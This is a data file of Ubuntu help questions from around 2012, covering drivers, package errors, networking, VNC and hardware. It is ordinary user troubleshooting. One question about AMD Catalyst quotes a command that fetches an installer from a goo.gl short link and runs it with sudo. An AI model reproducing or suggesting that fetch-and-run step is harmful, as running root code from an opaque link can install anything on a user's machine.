178861	how to keep 4 or more keyboard layouts ?	i use xubuntu 12.04 . how can i keep 4 layouts without a need to cycle through them every time ? are there comamnds to send to plugin and change the layout to a particular one ? i 'd like to organize them like this : russian and us dvorak in a cycle spanish dvorak and portuguese dvorak to switch to with a key
178868	why do some pdfs have such ugly fonts in document viewer ?	why are the fonts in document viewer so ugly and non-antialiased ?
178869	huawei dongle keeps on disconnecting when idle . how do i stop this ?	i have a huawei e172 usb dongle that works perfectly with precise . however it keeps on disconnecting the internet connection when i 'm not doing anything that requires internet connection . i think it has to do with powertop tunables . i have turned so many things off in this section . here is the list of the things i turned off :
178879	apt-get broken , can not fix or remove libapt-pkg4.12	i managed to break my package management . if i try to make an upgrade , i get : $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libapt-pkg4.12 : breaks : libapt-pkg4.12 : i386 ( ! = 0.8.16~exp12ubuntu10.3 ) but 0.8.16~exp12ubuntu10.2 is installed libapt-pkg4.12 : i386 : breaks : libapt-pkg4.12 ( ! = 0.8.16~exp12ubuntu10.2 ) but 0.8.16~exp12ubuntu10.3 is installed e : unmet dependencies . try using -f. then i try to follow apt-get recommendation : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : libapt-inst1.4 : i386 libapt-pkg4.12 : i386 0 upgraded , 0 newly installed , 2 to remove and 33 not upgraded . 48 not fully installed or removed . after this operation , 3â 866 kb disk space will be freed . do you want to continue [ y/n ] ? e : internal error , no file name for libapt-pkg4.12 kubuntu 12.04 64bit . can anyone help me to solve it ?
178884	why was synaptic removed since the usc does not have all the packages ?	just did a fresh install of 12.04 , and for the first time did n't have synaptic . so , i tried seeing if i could find the packages i needed ( mostly tex and dev stuff ) in the software center , but no such luck . back to synaptic it was , then . so , why did they remove synaptic , if you ca n't even get at most of the packages through the usc ? in the answers to this question , it was claimed that synaptic was `` redundant '' , but this is obviously not the case . before saying that usc completely replaces synaptic , just try installing a dev library using usc..
178887	libreoffice latest version color sort	i would like to arrange my cells according to color . i have a mix data cell with different colors in between , and would like to arrange them so all the same colors are with each other ... is it possible , if - how ? ?
178889	why does my sound device have 15 different profile options , and which do i want ?	i have a computer acting as a sound server , managed by pulseaudio . all computers on my lan send sound to that machine . it has a kenwood digital audio device connected to it . when i open pavucontrol on that sound server , it looks like this : so far so good . the gf108 is , as i 've learned , a sound controller on my nvidia card , and the built-in audio is the motherboard 's sound chip , and the kenwood audio device is the one i want to use . however , when i click on the profile : option , i get this pop-up menu of options : why does this one device have 15 different options , and what is the difference between them ? i have , of course , tried different ones , and they all seem to work . why would i select one over any other ? additional note for some context : my motivation for looking into this is that currently my sound set up has two problems . one is that it ca n't play more than one sound at a time - any app that is playing a sound takes exclusive control , and starting a sound in a new app causes freezes or crashes . my sound setting used to be able to play multiple streams so i think this should be possible . the other problem is that volume settings are hard to control .
178891	asus zenbook ux31e heats up and fan works constantly with 12.04	i bought the asus zenbook ux31e a few days ago and installed ubuntu 12.04 . everything works well , but the cpu temperature ( and overall the machine ) seems too hot and the fan works too often , even with moderate or no cpu load . i understand that there where similar issues in the past , but i thought these where resolved ( i had the same issues with a dell and 10.04 , but it almost went away eventually after some updates ) . i 've installed psensor and it reports around 81c , after a fresh boot and minimal load ( 12 % cpu ) and the fan is constantly on . anyone with suggestions ? note : this laptop only has an integrated graphics chip .
178892	how to access google drive from ubuntu	is there any app that can fully integrate with ubuntu ( with nautilus ) to access google docs and other files that i have stored on my google drive ? is it possible to do a selective sync from gdrive to ubuntu ?
178896	trying to boot ubuntu from usb - only getting freedos command prompt	i own a little acer aspire one with no cd drive ( it 's a 10 ' notebook and was given it with operating system / avg failure and wont boot windows ) . so i thought i 'd put linux on it . i have a cd with i386 - 32bit ( as it is compatible with most things ) which i 've had running on a hp notebook of a friend 's . i have created an iso with imgburn and created a boot-able thumb drive ( 4 gb imation ) with rufus . when i boot from usb , i am asked for a keyboard layout - no worries and then i get a command prompt ( feedos display version 0.013 ) . once i managed to get a very basic help screen , that got me nowhere of use . the only thing i can get it to do is tell it a : > drive which it chucks a hissy fit as this is not the usb drive and it is stuck at that . wondering what i 've got wrong ? i should add that i 've done this using the image of ubuntu 12.04 i386 live cd if any of this makes a difference . any help would be much appreciated .
178906	how to install mono from source ?	i am trying to install mono from source ( because in the future i will need to fix a bug in it ) . problem : the compiled mono does not behave properly . note : http : //www.mono-project.com/compiling_mono_from_git is not the whole answer . sparkleshare runs fine on ubuntu 's packaged mono , but i get a typeloadexception after following the instructions on that page , so some dll settings or something need to be configured too ( confirmed on irc ) , but i ca n't find a complete documentation , that is why i ask here . i also tried this : install ubuntu 2012.04 ( mono is not installed by default ) sudo apt-get install curl git compile+install mono 2.11 using this automatic script i am testing with sparkleshare . installing the .deb package would retrieve ubuntu 's mono package ( which i do n't want ) . building sparkleshare on the machine itself fails saying package requirements ( mono > = 2.8 ) were not met ) . so i just ransudo make install` after having compiled on a machine . when i run it ( mono bin/sparkleshare.exe ) : a type load exception has occurred . at sparkleshare.program.main ( system.string [ ] args ) [ 0x00000 ] the exact same thing works fine if i use ubuntu 's mono instead of the built-from-source mono .
178907	update-grub is setting a wrong linux root partition	initially , ubuntu was installed on another partition ( sda5 or sda4 ) . at some point i did manually move the root partition to sda2 . now , the problem is that whenever a new kernel is installed , the automatic regeneration of the menu.lst is using the old linux partition . so i have to manually change in menu.lst the lines : root ( hd0,5 ) into root ( hd0,1 ) how can i configure update-grub to automatically generate menu.lst with the current linux root partition ? i assume that the ( hd0,5 ) was written somewhere at installation , but i could n't find it .
178909	not enough space in /var/cache/apt/archives/	i had yesterday problem to install a package called ckan , and then i had some buggs . in fact , it was solved because odf the following : the doc http : //docs.ckan.org/en/ckan-1.7.1/install-from-package.html indicated to run the command : echo `` deb http : //apt.ckan.org/ckan-1.major_version lucid universe '' | sudo tee /etc/apt/sources.list.d/ckan.list but the doc does n't precise that it is dedicated to ubuntu 10.4 , . so for ubuntu 12.4 , the right doc is http : //docs.ckan.org/en/ckan-1.7.1/install-from-source.html so now , i have another issue : when i run the command to install the package solr-jetty , i am told 'you do n't have enough free spacve in /var/cache/apt/archives/' here 's the result of the df -h command : knowing i have installed ubuntu with virtualbox on my mac , how can i fix that problem ? best
178917	how do i limit users in a certain group to using a few specific applications ?	i want to let users in a particular group use firefox , remmina remote desktop and printers , but no other applications or utilities . how can i do that ?
178920	problem installing bumblebee on ubuntu 10.10	i am installing bumblebee on my laptop ( ubuntu 10.10 ) , and there are some problems when i use this code to install it : sudo add-apt-repository ppa : bumblebee/stable sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia sudo usermod -a -g bumblebee roselectric sudo reboot i got this message in terminal : the following packages have unmet dependencies : bumblebee-nvidia : depends : nvidia-current ( > = 260.19.12~ ) but 260.19.06-0ubuntu1 is not going to be installed e : broken packages then i used sudo apt-get install to install nvidia-current and bumblebee , and installation succeeded . however , when i sudo apt-get install bumblebee-nvidia i got this message in terminal : the following packages have unmet dependencies : bumblebee-nvidia : depends : nvidia-current ( > = 260.19.12~ ) but 260.19.06-0ubuntu1 is going to be installed e : broken packages do anyone knows how to solve this problem ? thanks in advance .
178921	what does a red background mean on launcher mouse-over help ?	i do n't know the proper term is for the label that appears when the mouse cursor is left over one of the launcher items . it 's shaped like a gardener 's plant label , with the name of the application written on it , and is usually dark grey with a white edge and with transparent triangles at the sharp end . after several weeks of using unity , i 've noticed that the transparent triangles have become red , and affect most , but not all , of the launcher icons . as i type this , all the launcher items except those for `` update manager '' and `` rhythmbox '' are affected . this does n't happen every time i boot up my system , so i suspect it is a bug not a feature . ps the last time this happened , i found that clicking on the dash icon did n't open up the dash as usual , just a close/minimise/maximise bar at the top left-hand corner of the screen . a reboot has fixed it ( for the moment ) . i think it 's possible that this problem is linked with the software updater . i 'll keep an eye open !
178922	how do i fix the `` can not source a directory : $ home/.vimrc '' error which pops up when i open gvim ?	i created the $ home/.vimrc folder manually . when i delete the folder the error does not appear .
178928	how to configure internet download manager 6.11 with wine ?	i 've been using idm 5.01 configured with on wine on backtrack 5 r3 ( ubuntu 10.04 lucid ) [ working fine ] . now i decided to change the version of idm to 6.11 and when i add the url and press download now the page that should come up , suddenly disappears and there 's nothing i can do , can someone suggest a solution ?
178929	how do i fix the hdmi/dvi display output with intel hd 4000 graphics in 12.04 ?	i have an alienware dell pc with intel hd 4000 graphics ( ivy bridge ) as verified by the output of lspci | grep vga posted below . 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) the pc only has hdmi and dvi display outputs and using the hdmi output i am only being offered abnormal resolutions . as you can see below it does not even list hdmi1 or dvi1 but just only a fallback . $ export display=:0.0 & & xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1360 x 768 , maximum 1360 x 768 default connected 1360x768+0+0 0mm x 0mm 1360x768 0.0* 1024x768 0.0 800x600 0.0 640x480 0.0 how can i fix this ? does it just need to be configured differently or will i need to use a newer kernel ( as intel graphics drivers are included in the kernel ) ? follow up : kernel to latest step 1 : go to : http : //kernel.ubuntu.com/~kernel-ppa/mainline/ go to last : http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6-rc3-quantal/ download : http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6-rc3-quantal/linux-headers-3.6.0-030600rc3-generic_3.6.0-030600rc3.201208221735_amd64.deb http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6-rc3-quantal/linux-headers-3.6.0-030600rc3_3.6.0-030600rc3.201208221735_all.deb http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6-rc3-quantal/linux-image-3.6.0-030600rc3-generic_3.6.0-030600rc3.201208221735_amd64.deb http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6-rc3-quantal/linux-image-extra-3.6.0-030600rc3-generic_3.6.0-030600rc3.201208221735_amd64.deb step 2 : sudo dpkg -i linux*.deb step 3 : reboot which shows that i have ubuntu 12.04 with latest $ uname -a linux sun-alienware-x51 3.6.0-030600rc3-generic # 201208221735 smp wed aug 22 21:36:32 utc 2012 x86_64 x86_64 x86_64 gnu/linux but still same problem remain .
178931	does ubuntu come with disk partitioning in the installer ?	when i install ubuntu i want to know whether it will give me the option to partition my disk . i am installing ubuntu for my laptop and i need some of my windows stuff as well . i would be thankful to anyone who answers
178937	how to install more than one package with only one command via terminal ?	i would like to do like on synaptic - when you mark all the packages you want to install - and install all packages i want with a single command .
178939	how do i remove ugly google chrome icon in the gnome3 applications tab ?	when i search in applications of gnome for chrome , i get two entries : the left one in the picture is ok with a high resolution icon , the right one has a low resolution icon . i could n't figure out where the second one is coming from . does anyone have an idea ? i would like to remove it .
178940	how do i develop my own display manager ?	for some reasons we need to create our own display manager . we need some very special biometric identification of users . if any one can give me some links to documentation or standarts or any information from which we can start . we need : identify user on workstation with our biometric subsystem . workstation must ask server to find mapping between biometric information and user account . accounts are stored in ldap server . then work station must say something like `` hello denis . enter your password '' . and after user enter his password workstation have to authenticate user using kerberos throw pam subsystem . if user ca n't pass biometric identification he mast press special button and authenticate using simple user name and password , but this must be logged in security log . p.s . now we are try to understand lightdm source code . but it 's very hard because we do n't understand fundamental principals of display managers ( dm ) and principal of interacting dm with over system such as pam , gnome , profiles etc .
178947	how to install firefox 14.0.1 ( or any other latest version ) on ubuntu 10.10 ?	here is the deal . my primary os is ubuntu 10.10 . i like it so far and i do n't want to upgrade yet to the latest version . but , i also want to install the latest stable version of firefox which is 14.0.1 , as it is my favourite browser . what should i do as there are no more updates for maverick through the official update manager ? i also have installed opera through the latest version repository and whenever there is a new version i can update it . is n't there something similar for firefox ?
178950	can not bind transmission ( or any other app ) to local ip when connected to vpn	i want all my applications to use vpn connection except for transmission , which i want to use my eth0 interface . but when i set `` bind-address-ipv4 '' : '' 192.168.250.2 '' in the settings.jason , transmission could n't connect to any peer . i also found out that i ca n't bind any application to local network interface when the vpn is connected , for example : when the vpn is not connected : $ ping -i 192.168.250.2 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) from 192.168.250.2 : 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=44 time=229 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=44 time=229 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=44 time=229 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=44 time=227 ms 64 bytes from 8.8.8.8 : icmp_req=5 ttl=44 time=226 ms ^c -- - 8.8.8.8 ping statistics -- - 5 packets transmitted , 5 received , 0 % packet loss , time 4004ms rtt min/avg/max/mdev = 226.323/228.578/229.797/1.332 ms when the vpn is connected : $ ping -i 192.168.250.2 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) from 192.168.250.2 : 56 ( 84 ) bytes of data . ^c -- - 8.8.8.8 ping statistics -- - 133 packets transmitted , 0 received , 100 % packet loss , time 132177ms
178951	unable to create 12.04 boot cd or dvd	i am trying to upgrade my pc to 12.04 , so i downloaded the .iso desktop file to burn onto a cd or dvd . before creating the disk i first made a bootable usb stick ( using pendrive ) , this worked fine in one pc but not in the one i need to upgrade , i suspect due to bios not supporting this feature . so i have tried to create both a boot cd and dvd , using various burning programs : using windows 7 , right click on the .iso file cdburnerxp imgburn , selecting the write image file to disk option . in every case the cd or dvd just has the one .iso file written to it , there is no file structure . however , if i look at the usb stick i created from the same .iso file it has the files i expect to see , and it works . so what is going wrong here , i 've never had this issue in the past , and am totally out of ideas .
178954	how do i make brightness settings persist across rebooting ?	i 'm using 12.04 with up to date packages running on a dell inspiron n4030 laptop with an ati radeon hd 5400 graphics card . i 'm using the new catalyst 12.6 graphics driver ( this version already fixed various bug with linux kernel 3.0 ) the problem is when i reduce the brightness and then restart it . the brightness is not saved , even when i use a startup script : cat /etc/rc.local '' echo 0 > /sys/class/backlight/acpi_video0/brightness '' when i use this script , it works initially , but then after a second the brightness changes to level 15 as if a second script is at work . sometime when i am logged in the brightness will increase without input from me as well . is there is any solution ?
178959	automatic power on after suspend	with every laptop i 've had which had ubuntu installed on it , first my acer aspire one and then my dell inspiron 15r , when i close it , it goes into suspend mode . when i open it , it attempts to power back up . is this normal ?
178962	how to start lxde session automatically after tightvncserver starts to make me able see desktop when connecting to the host via vncclient ?	i have system which is equipped with intel celeron processor 1.1 ghz s370 with 384 mb of ram on intel d815egew motherboard which supports wake-on-lan function . i want to use such a pc for internet sharing to the local network . also this pc is a dhcp+dns server as well as router/gateway . based on above i decided to install lubuntu as it is lightweight system . i installed lubuntu 10.04.4 lts from alternate iso . system has no auto login . system boots and has acceptable performance . host pc has onboard 4 network adapters : eth0 – ethernet controller which is used for local network connections . has static address 10.0.0.1 eth1 – ethernet controller which is not used and not configured so far , i plan to connect printer here later on . eth2 - ethernet controller which is used to connect to internet , which we plan to share for the local network wlan0 – wireless controller , it is used in role of access poit for local network and has address 10.0.0.2 we want to control our gateway remotely . so , we need to be able to power it on remotely . to allow this i’ve done the following things : $ cd /etc/init.d/ made a new file with command $ sudo vim wakeonlanconfig wrote the following lines to the newly created file , saved and closed it # ! /bin/bash ethtool -s eth0 wol g ethtool -s eth2 wol g exit made the abovementioned file executable $ sudo chmod a+x wakeonlanconfig then included it into autostart sequence during boot . $ sudo update-rc.d -f wakeonlanconfig defaults after system reboot we will be able to poweron system remotely . than we need to have a possibility to connect remotely to the host via ssh and vnc . so , i installed following packets with the following commands : $ sudo apt-get update $ sudo apt-get install openssh-server tightvncserver add ssh daemon into autostart sequence during boot . $ sudo update-rc.d -f ssh defaults power off the host pc $ sudo halt then i went to remote place , send magic paket and powered the host up . system started ... and i connected to the host via putty from remote system under windows . than logged in and run the command to start vnc server . $ tightvncserver -geometry 800x600 -depth 16 :2 vnc server successfully started and i got message like follows . new 'x ' desktop is gateway:2 starting applications specified in /home/dolv/.vnc/xstartup log file is /home/dolv/.vnc/gateway:2.log using ultravnc viewer programm under windows i connected to the host 's vnc server , enterd the password and ... . sow only mouse cursor in form of cross on a grey background of 800x600 dots , no desktop . here is my .vnc/xstartup file # ! /bin/sh xrdb $ home/.xresources xsetroot -solid grey # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & # fix to make gnome work export xkl_xmodmap_disable=1 /etc/x11/xsession the question : what i have to change and where to make lxde session start automatically after tightvncserver starts ?
178963	problems burning ubuntu onto a cd - too big	i 'm trying to install ubuntu 12.04 onto a cd , but i 'm running into a problem ; namely that my cd can only hold 702mb of data , yet the iso itself when i try to burn it becomes 736mb . what am i doing wrong in burning ? thank you in advance . or what should i do ? on another note , a dvd is not an option , since i have an old laptop ... and i 'm not sure if my usb stick which is also pretty old can be booted from . so any and all advice regarding either how to burn to a cd , checking if my usb can be booted from , or alternatives to ubuntu i can use would be much appreciated .
178966	after system crash all characters are substituted by rectangles	after a system crash and therefore a reboot all characters got substituted by white rectangles ( only these rectangles are displayed by 12.04 lts - even in the terminal ) . the characters in e.g . google chrome are correctly displayed . when i start a terminal session via ctrl+alt+f1 , the system characters are properly shown . do you have any idea how to fix this issue ?
178968	how to configure ntp time synchronization on a server ?	i would like to configure my ubuntu 12.04 server to synchronize its clock with a specific ntp server . where to set this up ?
178970	i need to reset my computer 's ip address to dhcp from static	i have been running a file server on ubuntu for a couple of years now . recently i had to take the network down . when i brought it back up , my server lost its ip address from the router . i ca n't remember how to put it back in the dhcp mode . i know that running a server in the dhcp mode is n't optimal , but my router wo n't allow me to assign static ip addresses . it will let me set a `` forever '' lease time which has worked just fine . all i need to do is go dhcp on the server , find the ip address it has been assigned , and then set that as a static ip address on the server . again , it 's not the optimal solution , but it was the one that worked . i would like to replace the router , but it has worked so well until now that i ca n't justify replacing it . any help is appreciated .
178972	how to configure an ubuntu virtual server and vmware esxi5 the way vmware would be able to shut it down properly ?	i run an ubuntu 12.04 server as a virtual machine on a vmware esxi 5 server . i 've configured vmware to shut the quest machines down the sane way ( with an acpi ( if i understand it righ ) shutdown signal so that guest oses would do it ) . and this works with other vms ( running windows 7 professional and opensuse ) but does n't work with the ubuntu server - vmware still offers just to power them off when i ask it to stop the guest . any ideas how to fix this ?
178975	enabled root password and have system policy and sudo problem	i enabled the root password a while back . but not three days ago . i 'm using ubuntu 12.04 with latest updates . my laptop is vostro 3500 for about three day ago , i saw the symptoms . and those are , when i use sudo on terminal , it does n't ask for my password . it just do it . eg . sudo apt-get update just execute . i use cpufreq utilities and their unity indicator to change cpu scaling . it did n't ask for my password . but , now window appear to ask my password when i want to change cpu scaling mode . ( ondemand to power save etc. ) ( password windows is same as when i open synaptic package manager . ) .
178979	hungarian accented keys ( áíúöüóúű ) stopped working after messing with wine	here is my problem , i would really appreciate some help ! hungarian accented characters ( áíúöüóúű ) stopped working . i use ubuntu through vnc , and i was trying to install wine . the install process from ubuntu software center stopped at 66 percent ( it poped up a question i did not notice ) , i shot it down . after that i can not use my accented keys . even when i copy-paste strings form win in the ubuntu-vnc window , it leaves out the accented characters . from 'xxáűőúüóöxx ' becomes 'xxxx ' after paste . the web browser and the command line utilities displays these characters correctly , only the keys do n't do anything . i tried to remove and install various font-packages , thet were recently updated/removed , but the problem is , i do n't know the root cause , so basicly i just try stuff blindly . here is the recent content of the /var/log/apt/history.log file : start-date : 2012-08-22 09:43:19 install : libopenal1 ( 1.12.854-0ubuntu1~lucid1 ) , ttf-umefont ( 411-1 ) , wine1.2 ( 1.2.2-0ubuntu2~lucid1 ) , icoutils ( 0.29.1-0ubuntu1~lucid ) , ttf-mscorefonts-installer ( 3.2ubuntu0.1 ) , wine ( 1.2.2-0ubuntu2~lucid1 ) , cabextract ( 1.2-3+lenny1build0.10.04.1 ) , ttf-symbol-replacement ( 1.2.2-0ubuntu2~lucid1 ) , wine1.2-gecko ( 1.0.0-0ubuntu4 ) , libmpg123-0 ( 1.12.1-0ubuntu1 ) , winbind ( 3.4.7~dfsg-1ubuntu3.10 ) , libaudio2 ( 1.9.2-3 ) , gnome-exe-thumbnailer ( 0.7-0ubuntu1~lucid1 ) , ttf-droid ( 1.00~b112+dfsg+1-0ubuntu1 ) error : sub-process /usr/bin/dpkg returned an error code ( 1 ) end-date : 2012-08-22 12:59:02 start-date : 2012-08-22 12:59:42 remove : wine ( 1.2.2-0ubuntu2~lucid1 ) end-date : 2012-08-22 12:59:46 start-date : 2012-08-22 13:00:05 remove : wine1.2 ( 1.2.2-0ubuntu2~lucid1 ) end-date : 2012-08-22 13:00:12 start-date : 2012-08-22 13:00:22 remove : gnome-exe-thumbnailer ( 0.7-0ubuntu1~lucid1 ) end-date : 2012-08-22 13:00:27 start-date : 2012-08-22 13:00:38 remove : ttf-symbol-replacement ( 1.2.2-0ubuntu2~lucid1 ) end-date : 2012-08-22 13:00:41 start-date : 2012-08-22 13:00:48 remove : wine1.2-gecko ( 1.0.0-0ubuntu4 ) end-date : 2012-08-22 13:00:49 start-date : 2012-08-22 13:02:26 install : wine1.0 ( 1.0.1-0ubuntu13 ) , ttf-mscorefonts-installer ( 3.2ubuntu0.1 ) , wine1.0-gecko ( 0.1.0-0ubuntu1 ) end-date : 2012-08-22 13:04:15 start-date : 2012-08-22 13:27:49 install : wine1.2 ( 1.2.2-0ubuntu2~lucid1 ) , wine ( 1.2.2-0ubuntu2~lucid1 ) , ttf-symbol-replacement ( 1.2.2-0ubuntu2~lucid1 ) , wine1.2-gecko ( 1.0.0-0ubuntu4 ) , gnome-exe-thumbnailer ( 0.7-0ubuntu1~lucid1 ) remove : wine1.0 ( 1.0.1-0ubuntu13 ) , wine1.0-gecko ( 0.1.0-0ubuntu1 ) end-date : 2012-08-22 13:28:25 start-date : 2012-08-22 13:40:20 remove : ttf-umefont ( 411-1 ) end-date : 2012-08-22 13:40:24 start-date : 2012-08-22 13:56:41 remove : ttf-mscorefonts-installer ( 3.2ubuntu0.1 ) end-date : 2012-08-22 13:56:45 start-date : 2012-08-22 13:57:51 remove : ttf-symbol-replacement ( 1.2.2-0ubuntu2~lucid1 ) end-date : 2012-08-22 13:57:54 start-date : 2012-08-22 13:58:20 remove : ttf-droid ( 1.00~b112+dfsg+1-0ubuntu1 ) end-date : 2012-08-22 13:58:32 start-date : 2012-08-22 13:58:39 remove : ttf-wqy-microhei ( 0.2.0-beta-1 ) end-date : 2012-08-22 13:58:42
178989	audio/video chat in im	i 've recently migrated to linux ubuntu 12.04 lts from windows . to make this decision successful , i am trying to find solutions to preserve my old internet practices . instant messaging is one of them . most of my contacts use either msn/wlm or yahoo on windows . pidgin 2.10.3 ( i 've installed ) on ubuntu does nice job to gather them just under one roof . but , i do n't know if i can audio/video chat with them through it . if yes , how ? and if not , which application makes it possible keeping all other facilities ( file transfer , emoticons , etc ) available ?
178994	ubuntu 12.04 wo n't shut down	i know similar questions have been asked , but i ca n't seem to locate and answer ... so i thought i would take a stab . however i attempt to shutdown , poweroff or restart , ubuntu hangs on the red ubuntu screen ( with the 4 dots - the first one lights up ) and it stays there . i left it one last night and it was still there this morning . is this a bug ? is there a fix ? will 12.10 resolve this ? it is obvious i am not the only one dealing with it . thanks
178995	how to activate different wired profiles in gnome3 ?	i ca n't find out how to activate different wired profiles through gnome3 network panel ( $ gnome-control-center network ) ; i created these profiles within nm-connection-editor ? ... or is there a way to recreate these directly within the new ( frustrating ) gnome3 network panel ? thanks for any help . kind regards .
179002	turn on 'window compositing ' ?	on the google hangounts support board it says : issues screen sharing on linux devices . if you are having trouble screen sharing on linux , please check that window compositing is enabled . i am having issues screensharing on my ubuntu 12.04 . how can i turn this on ?
179016	keyboard shortcuts for window placement not working	i am trying to find a shortcut to tile windows right and left , but have trouble using both ctrl-super-→ , ctrl-super-← and the ctrl-super-num # functions . i have tried to modify it by installing ccsm - > window management - > grid and set `` put right '' to super-→ , etc , and then logged off and on again , but nothing seems to work . what am i doing wrong , and what can i do to fix it ?
179018	how directx friendly is ubuntu ?	i use steam and i have nearly 200 games for it http : //steamcommunity.com/id/avalanch07/games ? tab=all how compatible or friendly is ubuntu with directx ? also keep in mind that several of my favorite games use gfwl such as fable 3 , dawn of war 2 , red faction guerrilla among others . i have been thinking about installing ubuntu to run alongside windows but first , i need to know how reliable ubuntu is as a gaming platform ?
179019	slow for no apparent reason	ubuntu is becoming slow for no apparent reason . i 'd like some help with analysing and fixing this issue . usually when a system slows down , that 's because the software is using too much system resources , but my cpu and ram usage usually does n't even reach 40 % . still , the system starts slowing down and applications stop responding more frequently . i 've also experienced complete system freezes , a few times . another reason can often be that the hardware is simply getting old , but that ca n't possibly be the case , as this computer is not even half a year old yet . ubuntu 12.04 amd64 , fresh installation . i am using the nvidia-current drivers . system specifications processor : amd fx-6100 6-core 3.3 ghz memory : corsair 8 gb ddr3-1600 kit 8gb ddr3 ram storage : seagate st2000dm001 2tb 7200rpm hdd motherboard : asus m5a88-v evo graphic card : msi n430gt-md1gd3 ( nvidia gt430 , 1gb video memory ) sensors robin @ robinj : ~ $ sensors atk0110-acpi-0 adapter : acpi interface vcore voltage : +0.94 v ( min = +0.85 v , max = +1.60 v ) +3.3 voltage : +3.28 v ( min = +2.97 v , max = +3.63 v ) +5 voltage : +5.10 v ( min = +4.50 v , max = +5.50 v ) +12 voltage : +11.88 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 468 rpm ( min = 600 rpm ) chassis fan speed : 865 rpm ( min = 600 rpm ) power fan speed : 1041 rpm ( min = 600 rpm ) cpu temperature : +34.0°c ( high = +60.0°c , crit = +95.0°c ) mb temperature : +30.0°c ( high = +45.0°c , crit = +75.0°c ) k10temp-pci-00c3 adapter : pci adapter temp1 : +19.2°c ( high = +70.0°c ) ( crit = +70.0°c , hyst = +67.0°c ) fam15h_power-pci-00c4 adapter : pci adapter power1 : 49.44 w ( crit = 95.01 w ) if you need more information , just ask for it . thanks for the help , people , but ubuntu crashed on me yesterday , and i see little reason to try and repair it , as it 's more trouble than it 's worth in my opinion . installing a new distro ( probably not ubuntu , i 've had it with bugs and slowness for the time being ) will fix this problem too , so i 'm going to close this question . thanks again for the help .
179023	low graphics mode when installing 12.04 from a live cd	i have a ppc g4 tower with xclaim vr rage 128 pro pci dvi mac , microsoft mouse and a crywolf coolmac silicone keyboard . i was able to live boot from the cd . turned the computer on and it live booted . i got an error message saying it was running in low graphics mode because it could not recognize the graphics card or the other input devices .
179026	error while installing gnome-shell-extensions-user-theme	while trying to install this package , i get this error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unable to correct problems , you have held broken packages . how i can fix it ?
179030	how to make a complete set of cds to use for setting up a new pc ?	i want to load ubuntu on to a pc with a freshly formatted clean hard drive . can i copy all the files to a cd from the internet through a windows pc and the use the cds to set up the new machine ? obviously the new machine can not be on line as it contains no operating system .
179034	installing ati catalyst in samsung 305u notebook	i installed ubuntu 12.04 lts on my samsung 305u notebook . the thing is when i close de lid it does't resume from suspension , the same problem reported here . i removed the proprietary video drivers from system settings and it fixed the problem but videos runs choppy . i tried to install ati catalyst drivers as shown here i could n't do it the way it was explained because it was impossible to install ia32-libs . then i tried the second most voted aswear : cd /tmp & & wget -o amd-driver-12-6-x86_64.run http : //goo.gl/xbfyi chmod +x amd-driver-12-6-x86_64.run sudo sh amd-driver-12-6-x86_64.run this way i was able to install ati catalyst , presumably in it 's 12.6 version , but when i rebooted i got a `` unsupported amd hardrive '' watermark it lower-right side of the screen . does that mean ati catalyst are n't installed properly ? is there any way to fix it ? all i need is the notebook to resume from suspension while having the video drivers properly installed .
179038	how to make firefox load thumbnails in the new tab page ?	i am using kubuntu 12.04 with firefox . since version 13 , a new tab in firefox displays a mosaic buttons representing the most visited pages as short dials to those pages . these buttons should be thumbnails , but in my case , there is no thumbnail to be seen in a any of these buttons , nor is there an option to force a thumbnail to be loaded . how can this be solved ?
179039	weird dialog box says error : success .. ?	what can cause this strange error dialog to pop up ? the message just says 'success ' . i was trying to copy a file from my desktop to my laptop over smb protocol , and the file does seems to have copied successfully , so i 'm not sure why it give an error dialog ? !
179044	how to change the color of the `` > > > '' from python when running in terminal	i was wondering if there is a way of changing the color of the `` > > > '' characters at the beginning of a newline in python when accessed from ubuntu 's terminal . i already edited the ~/.bashrc to change the color of the text in my terminal , but is there any file like this for python ?
179047	is it possible to make a dual windows 7 & ubuntu bootable usb flash drive ?	i am wondering if it is possible to make a dual bootable usb flash drive with both ubuntu and a windows 7 on it , so i can choose which os to use on startup ?
179048	how to partition disk in ubuntu and then install windows 7 ?	i installed 12.04 from pendrive . now i want to partition my 500gb hdd in the following order : 50gb for the ubuntu os , 70gb for windows 7 , remaining for data storage . how to do partition in ubuntu ? after that how to install windows 7 ?
179049	ubuntu customization	i am beginner on this os.i ask you to tell me how to customize my desktop or the appearance of this os on general.i mean these things that you ca n't do on windows.so i want to learn about softwares that do this kind of job and i want to tell me your current styles in order to try them too.thanks in advance
179058	12.04 lts on dell poweredge t300 installs , but wo n't boot	i 'm trying to get 12.04 lts 64-bit up and running on a dell poweredge t300 server with the dell sas 6/ir raid controller ( lsi sas1068e chipset ) . ubuntu installs just fine , does n't report any errors , sees the raid mirrors as drives , everything seems normal , but fails to boot up after the installation . it reports no boot device . the /boot partition is on /dev/sda1 and is marked as bootable , and when i installed ubuntu , i told it to install grub to the mbr . any suggestions for what i should check next ?
